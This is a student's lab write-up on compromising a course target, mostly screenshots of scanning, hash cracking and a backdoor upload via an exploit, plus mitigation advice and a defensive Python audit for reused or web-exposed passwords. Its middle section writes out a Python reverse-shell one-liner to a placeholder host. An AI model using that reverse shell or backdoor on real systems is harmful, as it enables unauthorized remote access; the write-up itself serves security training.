# Lab 10.2: Exploiting nancurunir

### Target: nancurunir.shire.org

### **Target IP Address**

<figure><img src="https://lh6.googleusercontent.com/UhZLvOlUK6kx66rITYzhMMAVzg5bgiMaZmfA4wMYqN_vQVgMk5XzB_UGfTYkRJZ-08HNSX1OyPs_8u8Lvjx9Mkrg2UzVFXrfRIuL5M_LU60pTbp4SRfm2cTdygXmJwPJriUXny_h7YSzUMELuX3ulM4" alt=""><figcaption><p>nslookup result</p></figcaption></figure>

### **Open Ports**

<figure><img src="https://lh6.googleusercontent.com/W_ygGZAl4loUYFITYjc2GCpBhVxgJCh7kGx_vgI-nnJ3AXNACUUo3KP2RETU0Rg3THvMGY6nfmGROgmQ3n39A2GfSxYIZyXETITumqkRhwCXa00ZG3Q7e7e_v8a3mVA3WHOuVq17khePnq8vv63fgTY" alt=""><figcaption><p>nmap result</p></figcaption></figure>

### **Discovered Vulnerabilities**

<figure><img src="https://lh4.googleusercontent.com/83D7SM22cWhOq4FNw-ug7Xty58Wlg2U5455b2UWkiYg-CJQ1KbHBnBP5ZarxLqo2hGQdyPiFBXzB81izI5WfQuMGkq4-QjiKkolexAQatNPnGWvzL-po_I5UPYfAYSDXEGZbCL1kECkxhlT38jrmrpc" alt=""><figcaption><p>dirb result</p></figcaption></figure>

<figure><img src="https://lh6.googleusercontent.com/VHw3gmhYa3kT2t_vEkBjEwvKK3mKQ4qrSMWyr2nw7vXce7AthQStsUd3VBTidI_RDrCWsb-D4FlwZlAQ71edlHeGPihvqP6zEGrKu8Jr7A9rLNujBR_S8HD7wayzTTKJz2do6l8rUZkc7858Wd8_SlM" alt=""><figcaption><p>searchsploit for Apache</p></figcaption></figure>

<figure><img src="https://lh5.googleusercontent.com/iQo1RKX5xc1CIccDwHSpjo31zA19FnOI60tfKlYRWynghjWAdnLEoqXarK3FJXNYLQ7TcECeb37Szty5elJv3rakW9zBir5kO0ORVrd8evKNLUQLTFbtm6tG2emAe_VQoEdrsHpibNTepI0Q6HLLWts" alt=""><figcaption></figcaption></figure>

PHP version 4.8.1

<figure><img src="https://lh6.googleusercontent.com/hyAi2z9NB9jYmGBW0TS9_tBaNEqpWI0-epeOLuXbFx2qKILSI7UcVUSDWptP11uMJ6E8Xud7XQNt2DDGCYgtvYvZtVaCWAHWoA-MF0tMVooyTFpCWodZ3AeWTZ_nzht62Gry9ONfvdCLJlppr-xwtuY" alt=""><figcaption><p>searchsploit for phpmyadmin</p></figcaption></figure>

## **How you achieved a foothold**

### phpMyAdmin user password: `shallnotpass`

<figure><img src="https://lh3.googleusercontent.com/BtnTGU8aEPIG9n42rtajVJVJU7dSvGfdaNOtgp9FYR2qZlsr_Y7TNxOO41u9DGOKo7MWMnbjpi95eFvA4bVEwv5HnuyjZoGCMG3e1pMXS83AYnEsLof_4V37xJjvwEJfBprM5sUyE9tlmLzzDUHY-Rs" alt=""><figcaption></figcaption></figure>

### Root user password:

<figure><img src="https://lh3.googleusercontent.com/7Y0PKxgfjQCScFMmLdFN7_BsjHmqe1dsyVPs5iyIAAmEAvpSpdoLq3fzFAPkVkZ0wyc9Zdej6sV-akgFum13GUdaVX3byE-O4rheSiFZ6lMTmJRN5-NRoiA_65rNcieupKIL086kHKje6VnoUEygdH4" alt=""><figcaption><p>How to get the hash for gandalf</p></figcaption></figure>

<figure><img src="https://lh4.googleusercontent.com/5xHbfA5YDsHnH31ZlyywmWI-Ep1CF_7N0vAg-h-XQ5S1HbrtH6N-3zx9og8cmwq5aumFjDYjSOz_KG4QMuisZtpxZui_iDGRMECIAGMlwwGmsWPCawg37XCFDrYuJCQ-Za1SXPgUCrOdcCUP1LqRlMU" alt=""><figcaption><p>The Hash for the gandalf user</p></figcaption></figure>

<figure><img src="https://lh6.googleusercontent.com/4Rlp-6ru4liN_o2Lhy8kLVM3TCjk1iyG6K-d98Kf2rK5OznBJV3W5ZL9JhhsQCr2HZiniYraO-RtLsy8PVTbkWX_-5efxAQJd9vC731ybG4XFBKJYCq7N1R0S2cKJrE-DHVZwz_8trwTthrQtpJ3lIg" alt=""><figcaption><p>Password for gandalf User</p></figcaption></figure>

### Using exploit 50457 to upload a backdoor

<figure><img src="https://lh3.googleusercontent.com/-IqZUxbgyHr53X7mqWeGqxTSLLlpiCf66t1TZGZlmsJadtXCECJCgTHfm_haB0jt9HE6novlb6ubV8rYCMnsx7Ft4wnWBWVvNSOg8MQwDA9ILZRnWz6YstZe-WjLxBikrLGiMm4QI4AmvhYnh1qJGTs" alt=""><figcaption></figcaption></figure>

### Backdoor made

<figure><img src="https://lh5.googleusercontent.com/hAP5uxv33xvl5yJ7r8p3bfChTFd1hTmIbHyGip59lNeXVp2zfG9ycx1O3fVmjJBW-lxiyoOyL-9tQQPfyMr-UNuQrYLG4ZLxIER8hBQ0SYFPElhSUtNI9Stn59idqKexIkXtnx7eNkb668k6tZ95c-4" alt=""><figcaption></figcaption></figure>

### Backdoor uploaded

<figure><img src="https://lh6.googleusercontent.com/Z6ARWJ2Fhqq4E0TzDudiY78cy4QhJHp0_CL2ZnqxU72xSJOcy_D0n37TMbzmRMusjdZmS5_xp35aR6aDjAbWkc_Ip1dP7fncYM-jUZ5-9j5qoNsL0gKf5ptS4WbVdiIyFvR0knaWoWp8S_Oi23FbV-Y" alt=""><figcaption></figcaption></figure>

### Connect to the backdoor

<figure><img src="https://lh4.googleusercontent.com/fcOniVYnafQjv4Vv5okxjpOSSizvECQYDAlhnTaDhdxHpUDe4XurFnFM3TluutiSYsM7OyvWGDTrnt3DPsU2yjpqyLhHTk82nEZkbE-iQL4Gbm1KomJcR4AqkKv39wzJXOy66tfgFK4b2_QzhHIlOZ8" alt=""><figcaption></figcaption></figure>

### Create a reverse shell in weevely:

{% code overflow="wrap" %}

```bash
export RHOST="HOST";export RPORT=PORT;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
```

{% endcode %}

<figure><img src="https://lh3.googleusercontent.com/0nivbXk7a-GGe7Gc_SDxXvuspAklL2NXPDyQu4EkTfyoU1Mhv7jC-08kT7ddsFzoV94OG-oQUIfo-EVmB712iLTJqmNIuchLKtwwu_BxTQ-cAHHjyFWkXbeYEfoLqeZet5kF2OQRt2v1ZloR6WSPZXs" alt=""><figcaption></figcaption></figure>

## **How you achieved root/Administrative level compromise**

### Foothold using the gandalf user:

<figure><img src="https://lh3.googleusercontent.com/zvT743XzxnxOOOS2zj4nHtFtkWgaBc1yV2XvjE8xZOgZFb4YMD7mhI2pZ2GkSPzyIQJF2TiXAnSmYScyDPuSWRUjSnNVTsyA152CyEBnKDGzlYRHSf4DHu6at_c4e7UYFmudIkIliH2eA7WDXoyDCDI" alt=""><figcaption></figcaption></figure>

### **User Flag**

<figure><img src="https://lh5.googleusercontent.com/bmYOF_87X4eYkT-PFV_ZAQKY553tyH9khTpziQR-bjxGbQN8nddYpTK8shqDXK5YxyZ2ZTx4eReyDGrQwcj-zIc1T0cs2brDM6di2_O0MGczUeKqixZ4KZPfdgpjA9GEd4VJylElqeJ4rPXRh3aByBw" alt=""><figcaption></figcaption></figure>

### **Root Flag**

<figure><img src="https://lh5.googleusercontent.com/S53t74ho9rwL4yl7u9PiV0xOJSdzt1PrzDtMNwvXsjL83XJb3fuE2L26X6YUUcI0DBv43Rj9yxYaeizt_cHSAlGeSJgYlvg4P2VSCb8a5Ei7MyQcOQhRwyAweWoyKowusnO2oPVI8aB_gVKKMyci8iI" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh3.googleusercontent.com/80CiRd5zY4Jbyqe2fb3DbfW6Zogvy8fjPmlXxVPlK5Y8OmmxuFQx3s-GCpLKG42-v78mLacmx2IfY3lyQIyVSnxboUevr-hXVnzxOYhrBteSq1-K7l4cel3dz_e2iJ-WSpaKruyPXh5X2kt-7g2bpYQ" alt=""><figcaption></figcaption></figure>

### **How might the vulnerabilities be mitigated by the system administrator?**

Do not use the same MySQL root password as the host root password, and do not put a GIF on the website's homepage that is the same as the phpMyAdmin user password.
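As an added example (not part of the lab writeup), the Python audit below checks a host for both weaknesses named above: identical passwords across service configs, and a known password that appears in the name or contents of a file served from the web root. The config formats it reads (phpMyAdmin `config.inc.php` and a MySQL option file) and all sample data are assumptions constructed for illustration.

```python
"""Audit for credential reuse across services and credentials exposed in
web-served files. Added example; file formats and sample data are assumed."""
import os
import re
import tempfile
from collections import defaultdict

# Assumed config formats: phpMyAdmin config.inc.php and a MySQL option file.
PHPMYADMIN_PW = re.compile(r"\$cfg\['Servers'\]\[\$i\]\['password'\]\s*=\s*'([^']*)'")
MYCNF_PW = re.compile(r'^\s*password\s*=\s*"?([^"\n]+)"?\s*$', re.M)


def extract_credentials(configs):
    """configs: {service label: config file text}. Returns {label: password};
    services with no password, or an empty one, are skipped."""
    found = {}
    for label, text in configs.items():
        m = PHPMYADMIN_PW.search(text) or MYCNF_PW.search(text)
        if m and m.group(1).strip():
            found[label] = m.group(1).strip()
    return found


def reused_passwords(creds):
    """Return {password: [labels]} for every password shared by 2+ services."""
    by_pw = defaultdict(list)
    for label, pw in creds.items():
        by_pw[pw].append(label)
    return {pw: labels for pw, labels in by_pw.items() if len(labels) > 1}


def exposed_in_webroot(creds, webroot):
    """Return (label, relative path) for each served file whose name or bytes
    contain a known password (the GIF-on-the-homepage case from the lab)."""
    hits = []
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            for label, pw in creds.items():
                if pw in name or pw.encode() in data:
                    hits.append((label, os.path.relpath(path, webroot)))
    return hits


def demo():
    """Constructed scenario: both services share one password, and a GIF named
    after it is linked from the homepage. Returns (creds, reused, exposed)."""
    configs = {
        "phpmyadmin": "<?php\n$cfg['Servers'][$i]['password'] = 'shallnotpass';\n",
        "mysql_root": "[client]\nuser=root\npassword=shallnotpass\n",
    }
    creds = extract_credentials(configs)
    with tempfile.TemporaryDirectory() as webroot:
        os.makedirs(os.path.join(webroot, "img"))
        with open(os.path.join(webroot, "img", "shallnotpass.gif"), "wb") as fh:
            fh.write(b"GIF89a")  # constructed placeholder image
        with open(os.path.join(webroot, "index.html"), "w") as fh:
            fh.write("<img src='img/shallnotpass.gif'>")
        exposed = exposed_in_webroot(creds, webroot)
    return creds, reused_passwords(creds), exposed
```

Run `demo()` to see both findings on the constructed data; point `extract_credentials` and `exposed_in_webroot` at real config text and the real document root to audit a host.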

### Reflection

I did have trouble after I got access to the machine using weevely: I forgot how to make a reverse shell to be able to leverage the gandalf user.

### Report

<https://docs.google.com/document/d/1bGgOkBr3Hc3sTCex6RufGkkZMEZJ-MWAhUrAFgsWHhM/edit#>
